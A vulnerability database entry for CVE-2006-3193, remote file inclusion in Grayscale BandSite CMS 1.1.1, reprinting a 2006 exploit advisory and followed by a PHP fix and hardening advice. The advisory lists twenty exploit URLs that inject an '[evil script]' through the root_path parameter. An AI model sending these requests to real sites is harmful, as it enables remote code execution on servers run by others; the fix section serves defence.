Grayscale BandSite CMS Multiple PHP Remote File Inclusion Vulnerabilities

Vulnerability ID: 1110493    Vulnerability type: Code injection
Published: 2006-06-20    Updated: 2006-09-27
CVE ID: CVE-2006-3193    CNNVD ID: CNNVD-200606-459
Platform: PHP    CVSS score: 5.1
|Vulnerability sources
https://www.exploit-db.com/exploits/1933
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-459
|Vulnerability details
Grayscale BandSite CMS 1.1.1 contains multiple PHP remote file inclusion vulnerabilities. When register_globals is enabled, a remote attacker can execute arbitrary PHP code via a URL supplied in the root_path parameter to (1) includes/content/contact_content.php; multiple files under adminpanel/includes/add_forms/, including (2) addbioform.php, (3) addfliersform.php, (4) addgenmerchform.php, (5) addinterviewsform.php, (6) addlinksform.php, (7) addlyricsform.php, (8) addmembioform.php, (9) addmerchform.php, (10) addmerchpicform.php, (11) addnewsform.php, (12) addphotosform.php, (13) addreleaseform.php, (14) addreleasepicform.php, (15) addrelmerchform.php, (16) addreviewsform.php, (17) addshowsform.php and (18) addwearmerchform.php; (19) adminpanel/includes/mailinglist/disphtmltbl.php; and (20) adminpanel/includes/mailinglist/dispxls.php.
|Exploit
---------------------------------------------------------------------------
Grayscale BandSite CMS <=([root_path]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ]
Remote : Yes
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Grayscale BandSite CMS
version : latest version
URL :http://sourceforge.net/projects/bandsitecms/

------------------------------------------------------------------
Exploit:
~~~~~~~

Variable $root_path is not sanitized. When register_globals=on and allow_fopenurl=on, an attacker can exploit this vulnerability with a simple PHP injection script.

# http://www.site.com/[path]/includes/content/contact_content.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addbioform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addfliersform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addgenmerchform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addinterviewsform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addlinksform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addlyricsform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addmembioform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addmerchform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addmerchpicform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addnewsform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addphotosform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addreleaseform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addreleasepicform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addrelmerchform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addreviewsform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addshowsform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/add_forms/addwearmerchform.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/mailinglist/disphtmltbl.php?root_path=[evil script]
# http://www.site.com/[path]/adminpanel/includes/mailinglist/dispxls.php?root_path=[evil script]

---------------------------------------------------------------------------


Solution :
~~~~~~~~~

declare variable $root_path
---------------------------------------------------------------------------

Shoutz:
~~~~~
# Special greetz to my good friend [Oo]
# To all members of h4cky0u.org ;) and Romanian Security Team [ hTTp://Romania.HackTECK.BE ]
---------------------------------------------------------------------------


Contact:
~~~~~~~

E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://Romania.HackTECK.BE & http://www.h4cky0u.org/

-------------------------------- [ EOF] ----------------------------------

# milw0rm.com [2006-06-20]
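The root cause in the details section (an unassigned $root_path reaching include() under register_globals) and the advisory's one-line fix ("declare variable $root_path") side by side, as an added example that is not BandSite's own code; the directory layout and the includes/header.php target are assumptions standing in for whatever the affected scripts really include.

```php
<?php
// Added example, not BandSite CMS code. Assumed layout: this script sits two
// directory levels below the CMS root and includes 'includes/header.php'.

// BEFORE (the vulnerable pattern the advisory describes): $root_path is never
// assigned in this script. With register_globals=On a request carrying
// ?root_path=http://... creates the variable from the query string, and with
// allow_url_fopen=On (on PHP >= 5.2 also allow_url_include=On) include()
// fetches and executes the remote file.
//
//     include($root_path . 'includes/header.php');

// AFTER: assign $root_path from a server-side value before any include, which
// is exactly the advisory's fix ("declare variable $root_path").
$base = realpath(__DIR__ . '/../..');   // assumption: two levels below the CMS root
if ($base === false || !is_dir($base)) {
    http_response_code(500);
    exit('Configuration error: cannot resolve root_path');
}
$root_path = $base . '/';

// Defence in depth: refuse stream wrappers, NUL bytes and traversal so that a
// root_path from any other source (e.g. a legacy config file) cannot reach
// include() either. Assumes a Unix-style absolute path.
function is_safe_root_path(string $p): bool
{
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $p)) {   // http://, ftp://, php://, ...
        return false;
    }
    if (strpos($p, "\0") !== false || strpos($p, '..') !== false) {
        return false;
    }
    return $p !== '' && $p[0] === '/';   // absolute local path only
}

if (!is_safe_root_path($root_path)) {
    http_response_code(500);
    exit('Invalid root_path');
}

$target = $root_path . 'includes/header.php';
if (!is_file($target)) {
    http_response_code(500);
    exit('Missing include: ' . basename($target));
}
require $target;
```

Alongside the code fix, setting register_globals=Off (the directive was removed entirely in PHP 5.4) and allow_url_include=Off in php.ini removes the preconditions the advisory relies on, so an unassigned path variable can no longer be turned into a remote include.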